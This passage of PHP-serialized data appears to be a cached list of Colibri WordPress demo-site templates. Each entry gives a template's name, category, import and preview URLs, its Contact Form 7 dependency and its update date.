09:02:42.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:36;a:11:{s:16:\"import_file_name\";s:4:\"Auto\";s:4:\"slug\";s:4:\"auto\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:81:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/auto/content.xml\";s:22:\"import_widget_file_url\";s:81:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/auto/widgets.wie\";s:26:\"import_customizer_file_url\";s:84:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/auto/customizer.dat\";s:24:\"import_preview_image_url\";s:70:\"https://static.colibriwp.com/templates-screenshots/auto/screenshot.png\";s:11:\"preview_url\";s:42:\"https://colibriwp-work.colibriwp.com/auto/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-13 09:02:44.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:37;a:11:{s:16:\"import_file_name\";s:10:\"Business V\";s:4:\"slug\";s:10:\"business-v\";s:10:\"categories\";a:1:{i:0;s:8:\"business\";}s:15:\"import_file_url\";s:87:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/business-v/content.xml\";s:22:\"import_widget_file_url\";s:87:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/business-v/widgets.wie\";s:26:\"import_customizer_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/business-v/customizer.dat\";s:24:\"import_preview_image_url\";s:76:\"https://static.colibriwp.com/templates-screenshots/business-v/screenshot.png\";s:11:\"preview_url\";s:48:\"https://colibriwp-work.colibriwp.com/business-v/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-13 09:02:47.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:38;a:11:{s:16:\"import_file_name\";s:7:\"Charity\";s:4:\"slug\";s:7:\"charity\";s:10:\"categories\";a:1:{i:0;s:9:\"community\";}s:15:\"import_file_url\";s:84:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/charity/content.xml\";s:22:\"import_widget_file_url\";s:84:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/charity/widgets.wie\";s:26:\"import_customizer_file_url\";s:87:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/charity/customizer.dat\";s:24:\"import_preview_image_url\";s:73:\"https://static.colibriwp.com/templates-screenshots/charity/screenshot.png\";s:11:\"preview_url\";s:45:\"https://colibriwp-work.colibriwp.com/charity/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-13 09:02:48.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:39;a:11:{s:16:\"import_file_name\";s:13:\"Makeup Artist\";s:4:\"slug\";s:13:\"makeup-artist\";s:10:\"categories\";a:1:{i:0;s:8:\"business\";}s:15:\"import_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/makeup-artist/content.xml\";s:22:\"import_widget_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/makeup-artist/widgets.wie\";s:26:\"import_customizer_file_url\";s:93:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/makeup-artist/customizer.dat\";s:24:\"import_preview_image_url\";s:79:\"https://static.colibriwp.com/templates-screenshots/makeup-artist/screenshot.png\";s:11:\"preview_url\";s:51:\"https://colibriwp-work.colibriwp.com/makeup-artist/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-13 09:02:50.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:40;a:11:{s:16:\"import_file_name\";s:10:\"Mobile App\";s:4:\"slug\";s:10:\"mobile-app\";s:10:\"categories\";a:1:{i:0;s:8:\"business\";}s:15:\"import_file_url\";s:87:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/mobile-app/content.xml\";s:22:\"import_widget_file_url\";s:87:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/mobile-app/widgets.wie\";s:26:\"import_customizer_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/mobile-app/customizer.dat\";s:24:\"import_preview_image_url\";s:76:\"https://static.colibriwp.com/templates-screenshots/mobile-app/screenshot.png\";s:11:\"preview_url\";s:48:\"https://colibriwp-work.colibriwp.com/mobile-app/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-13 09:02:51.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:41;a:11:{s:16:\"import_file_name\";s:12:\"Music Artist\";s:4:\"slug\";s:12:\"music-artist\";s:10:\"categories\";a:1:{i:0;s:9:\"portfolio\";}s:15:\"import_file_url\";s:89:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/music-artist/content.xml\";s:22:\"import_widget_file_url\";s:89:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/music-artist/widgets.wie\";s:26:\"import_customizer_file_url\";s:92:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/music-artist/customizer.dat\";s:24:\"import_preview_image_url\";s:78:\"https://static.colibriwp.com/templates-screenshots/music-artist/screenshot.png\";s:11:\"preview_url\";s:50:\"https://colibriwp-work.colibriwp.com/music-artist/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-13 09:02:53.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:42;a:11:{s:16:\"import_file_name\";s:22:\"Photographer Portfolio\";s:4:\"slug\";s:22:\"photographer-portfolio\";s:10:\"categories\";a:1:{i:0;s:9:\"portfolio\";}s:15:\"import_file_url\";s:99:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/photographer-portfolio/content.xml\";s:22:\"import_widget_file_url\";s:99:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/photographer-portfolio/widgets.wie\";s:26:\"import_customizer_file_url\";s:102:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/photographer-portfolio/customizer.dat\";s:24:\"import_preview_image_url\";s:88:\"https://static.colibriwp.com/templates-screenshots/photographer-portfolio/screenshot.png\";s:11:\"preview_url\";s:60:\"https://colibriwp-work.colibriwp.com/photographer-portfolio/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-13 09:02:54.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:43;a:11:{s:16:\"import_file_name\";s:6:\"Resort\";s:4:\"slug\";s:6:\"resort\";s:10:\"categories\";a:1:{i:0;s:12:\"sport-travel\";}s:15:\"import_file_url\";s:83:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/resort/content.xml\";s:22:\"import_widget_file_url\";s:83:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/resort/widgets.wie\";s:26:\"import_customizer_file_url\";s:86:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/resort/customizer.dat\";s:24:\"import_preview_image_url\";s:72:\"https://static.colibriwp.com/templates-screenshots/resort/screenshot.png\";s:11:\"preview_url\";s:44:\"https://colibriwp-work.colibriwp.com/resort/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-13 09:02:56.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:44;a:11:{s:16:\"import_file_name\";s:6:\"Tailor\";s:4:\"slug\";s:6:\"tailor\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:83:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/tailor/content.xml\";s:22:\"import_widget_file_url\";s:83:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/tailor/widgets.wie\";s:26:\"import_customizer_file_url\";s:86:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/tailor/customizer.dat\";s:24:\"import_preview_image_url\";s:72:\"https://static.colibriwp.com/templates-screenshots/tailor/screenshot.png\";s:11:\"preview_url\";s:44:\"https://colibriwp-work.colibriwp.com/tailor/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-13 09:02:58.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:45;a:11:{s:16:\"import_file_name\";s:7:\"Theater\";s:4:\"slug\";s:7:\"theater\";s:10:\"categories\";a:1:{i:0;s:9:\"community\";}s:15:\"import_file_url\";s:84:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/theater/content.xml\";s:22:\"import_widget_file_url\";s:84:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/theater/widgets.wie\";s:26:\"import_customizer_file_url\";s:87:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/theater/customizer.dat\";s:24:\"import_preview_image_url\";s:73:\"https://static.colibriwp.com/templates-screenshots/theater/screenshot.png\";s:11:\"preview_url\";s:45:\"https://colibriwp-work.colibriwp.com/theater/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-13 09:02:59.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:46;a:11:{s:16:\"import_file_name\";s:13:\"Travel Agency\";s:4:\"slug\";s:13:\"travel-agency\";s:10:\"categories\";a:1:{i:0;s:12:\"sport-travel\";}s:15:\"import_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/travel-agency/content.xml\";s:22:\"import_widget_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/travel-agency/widgets.wie\";s:26:\"import_customizer_file_url\";s:93:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/travel-agency/customizer.dat\";s:24:\"import_preview_image_url\";s:79:\"https://static.colibriwp.com/templates-screenshots/travel-agency/screenshot.png\";s:11:\"preview_url\";s:51:\"https://colibriwp-work.colibriwp.com/travel-agency/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-08-13 09:03:01.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:47;a:11:{s:16:\"import_file_name\";s:6:\"Bakery\";s:4:\"slug\";s:6:\"bakery\";s:10:\"categories\";a:1:{i:0;s:10:\"food-drink\";}s:15:\"import_file_url\";s:83:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/bakery/content.xml\";s:22:\"import_widget_file_url\";s:83:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/bakery/widgets.wie\";s:26:\"import_customizer_file_url\";s:86:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/bakery/customizer.dat\";s:24:\"import_preview_image_url\";s:77:\"https://static.colibriwp.com/templates-screenshots/template-53/screenshot.jpg\";s:11:\"preview_url\";s:43:\"https://colibriwp-work.colibriwp.com/bakery\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-09-19 07:47:11.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:48;a:11:{s:16:\"import_file_name\";s:16:\"Cleaning Company\";s:4:\"slug\";s:16:\"cleaning-company\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:93:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/cleaning-company/content.xml\";s:22:\"import_widget_file_url\";s:93:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/cleaning-company/widgets.wie\";s:26:\"import_customizer_file_url\";s:96:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/cleaning-company/customizer.dat\";s:24:\"import_preview_image_url\";s:77:\"https://static.colibriwp.com/templates-screenshots/template-54/screenshot.jpg\";s:11:\"preview_url\";s:53:\"https://colibriwp-work.colibriwp.com/cleaning-company\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-09-19 07:47:14.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:49;a:11:{s:16:\"import_file_name\";s:15:\"Summer Festival\";s:4:\"slug\";s:15:\"summer-festival\";s:10:\"categories\";a:1:{i:0;s:12:\"sport-travel\";}s:15:\"import_file_url\";s:92:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/summer-festival/content.xml\";s:22:\"import_widget_file_url\";s:92:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/summer-festival/widgets.wie\";s:26:\"import_customizer_file_url\";s:95:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/summer-festival/customizer.dat\";s:24:\"import_preview_image_url\";s:81:\"https://static.colibriwp.com/templates-screenshots/summer-festival/screenshot.jpg\";s:11:\"preview_url\";s:53:\"https://colibriwp-work.colibriwp.com/summer-festival/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-09-19 07:47:52.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:50;a:11:{s:16:\"import_file_name\";s:12:\"Dance Studio\";s:4:\"slug\";s:12:\"dance-studio\";s:10:\"categories\";a:1:{i:0;s:12:\"sport-travel\";}s:15:\"import_file_url\";s:89:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/dance-studio/content.xml\";s:22:\"import_widget_file_url\";s:89:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/dance-studio/widgets.wie\";s:26:\"import_customizer_file_url\";s:92:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/dance-studio/customizer.dat\";s:24:\"import_preview_image_url\";s:78:\"https://static.colibriwp.com/templates-screenshots/dance-studio/screenshot.jpg\";s:11:\"preview_url\";s:50:\"https://colibriwp-work.colibriwp.com/dance-studio/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-09-19 07:47:56.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:51;a:11:{s:16:\"import_file_name\";s:9:\"Gardening\";s:4:\"slug\";s:9:\"gardening\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:86:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/gardening/content.xml\";s:22:\"import_widget_file_url\";s:86:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/gardening/widgets.wie\";s:26:\"import_customizer_file_url\";s:89:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/gardening/customizer.dat\";s:24:\"import_preview_image_url\";s:75:\"https://static.colibriwp.com/templates-screenshots/gardening/screenshot.jpg\";s:11:\"preview_url\";s:47:\"https://colibriwp-work.colibriwp.com/gardening/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-09-19 07:48:00.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:52;a:11:{s:16:\"import_file_name\";s:19:\"Political Candidate\";s:4:\"slug\";s:19:\"political-candidate\";s:10:\"categories\";a:1:{i:0;s:9:\"community\";}s:15:\"import_file_url\";s:96:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/political-candidate/content.xml\";s:22:\"import_widget_file_url\";s:96:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/political-candidate/widgets.wie\";s:26:\"import_customizer_file_url\";s:99:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/political-candidate/customizer.dat\";s:24:\"import_preview_image_url\";s:85:\"https://static.colibriwp.com/templates-screenshots/political-candidate/screenshot.jpg\";s:11:\"preview_url\";s:57:\"https://colibriwp-work.colibriwp.com/political-candidate/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-09-19 07:48:04.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:53;a:11:{s:16:\"import_file_name\";s:19:\"Horse Riding Center\";s:4:\"slug\";s:19:\"horse-riding-center\";s:10:\"categories\";a:1:{i:0;s:12:\"sport-travel\";}s:15:\"import_file_url\";s:96:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/horse-riding-center/content.xml\";s:22:\"import_widget_file_url\";s:96:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/horse-riding-center/widgets.wie\";s:26:\"import_customizer_file_url\";s:99:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/horse-riding-center/customizer.dat\";s:24:\"import_preview_image_url\";s:85:\"https://static.colibriwp.com/templates-screenshots/horse-riding-center/screenshot.jpg\";s:11:\"preview_url\";s:57:\"https://colibriwp-work.colibriwp.com/horse-riding-center/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-09-19 07:48:08.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:54;a:11:{s:16:\"import_file_name\";s:9:\"School II\";s:4:\"slug\";s:9:\"school-ii\";s:10:\"categories\";a:1:{i:0;s:9:\"community\";}s:15:\"import_file_url\";s:86:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/school-ii/content.xml\";s:22:\"import_widget_file_url\";s:86:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/school-ii/widgets.wie\";s:26:\"import_customizer_file_url\";s:89:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/school-ii/customizer.dat\";s:24:\"import_preview_image_url\";s:75:\"https://static.colibriwp.com/templates-screenshots/school-ii/screenshot.jpg\";s:11:\"preview_url\";s:47:\"https://colibriwp-work.colibriwp.com/school-ii/\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2019-09-19 07:48:13.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:55;a:11:{s:16:\"import_file_name\";s:13:\"Therapist PRO\";s:4:\"slug\";s:13:\"therapist-pro\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/therapist-pro/content.xml\";s:22:\"import_widget_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/therapist-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:93:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/therapist-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:79:\"https://static.colibriwp.com/templates-screenshots/therapist-pro/screenshot.jpg\";s:11:\"preview_url\";s:50:\"https://colibriwp-work.colibriwp.com/therapist-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2020-06-02 13:37:59.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:56;a:11:{s:16:\"import_file_name\";s:10:\"Museum PRO\";s:4:\"slug\";s:10:\"museum-pro\";s:10:\"categories\";a:1:{i:0;s:9:\"community\";}s:15:\"import_file_url\";s:87:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/museum-pro/content.xml\";s:22:\"import_widget_file_url\";s:87:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/museum-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/museum-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:76:\"https://static.colibriwp.com/templates-screenshots/museum-pro/screenshot.jpg\";s:11:\"preview_url\";s:47:\"https://colibriwp-work.colibriwp.com/museum-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2020-06-02 13:37:55.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:57;a:11:{s:16:\"import_file_name\";s:7:\"Eco PRO\";s:4:\"slug\";s:7:\"eco-pro\";s:10:\"categories\";a:1:{i:0;s:9:\"community\";}s:15:\"import_file_url\";s:84:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/eco-pro/content.xml\";s:22:\"import_widget_file_url\";s:84:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/eco-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:87:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/eco-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:73:\"https://static.colibriwp.com/templates-screenshots/eco-pro/screenshot.jpg\";s:11:\"preview_url\";s:44:\"https://colibriwp-work.colibriwp.com/eco-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2020-06-02 13:37:53.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:58;a:11:{s:16:\"import_file_name\";s:13:\"Carpentry PRO\";s:4:\"slug\";s:13:\"carpentry-pro\";s:10:\"categories\";a:1:{i:0;s:8:\"business\";}s:15:\"import_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/carpentry-pro/content.xml\";s:22:\"import_widget_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/carpentry-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:93:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/carpentry-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:77:\"https://static.colibriwp.com/templates-screenshots/template-74/screenshot.jpg\";s:11:\"preview_url\";s:50:\"https://colibriwp-work.colibriwp.com/carpentry-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2020-06-02 13:37:51.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:59;a:11:{s:16:\"import_file_name\";s:15:\"Babysitting PRO\";s:4:\"slug\";s:15:\"babysitting-pro\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:92:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/babysitting-pro/content.xml\";s:22:\"import_widget_file_url\";s:92:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/babysitting-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:95:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/babysitting-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:81:\"https://static.colibriwp.com/templates-screenshots/babysitting-pro/screenshot.jpg\";s:11:\"preview_url\";s:52:\"https://colibriwp-work.colibriwp.com/babysitting-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2020-06-02 13:37:50.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:60;a:11:{s:16:\"import_file_name\";s:15:\"Bike rental PRO\";s:4:\"slug\";s:15:\"bike-rental-pro\";s:10:\"categories\";a:1:{i:0;s:8:\"business\";}s:15:\"import_file_url\";s:92:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/bike-rental-pro/content.xml\";s:22:\"import_widget_file_url\";s:92:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/bike-rental-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:95:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/bike-rental-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:81:\"https://static.colibriwp.com/templates-screenshots/bike-rental-pro/screenshot.jpg\";s:11:\"preview_url\";s:52:\"https://colibriwp-work.colibriwp.com/bike-rental-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2020-06-02 13:37:48.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:61;a:11:{s:16:\"import_file_name\";s:8:\"City PRO\";s:4:\"slug\";s:8:\"city-pro\";s:10:\"categories\";a:1:{i:0;s:9:\"community\";}s:15:\"import_file_url\";s:85:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/city-pro/content.xml\";s:22:\"import_widget_file_url\";s:85:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/city-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:88:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/city-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:74:\"https://static.colibriwp.com/templates-screenshots/city-pro/screenshot.jpg\";s:11:\"preview_url\";s:45:\"https://colibriwp-work.colibriwp.com/city-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2020-06-02 13:37:47.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:62;a:11:{s:16:\"import_file_name\";s:12:\"Handyman PRO\";s:4:\"slug\";s:12:\"handyman-pro\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:89:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/handyman-pro/content.xml\";s:22:\"import_widget_file_url\";s:89:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/handyman-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:92:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/handyman-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:78:\"https://static.colibriwp.com/templates-screenshots/handyman-pro/screenshot.jpg\";s:11:\"preview_url\";s:49:\"https://colibriwp-work.colibriwp.com/handyman-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2020-06-02 13:37:45.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:63;a:11:{s:16:\"import_file_name\";s:13:\"Home Deco 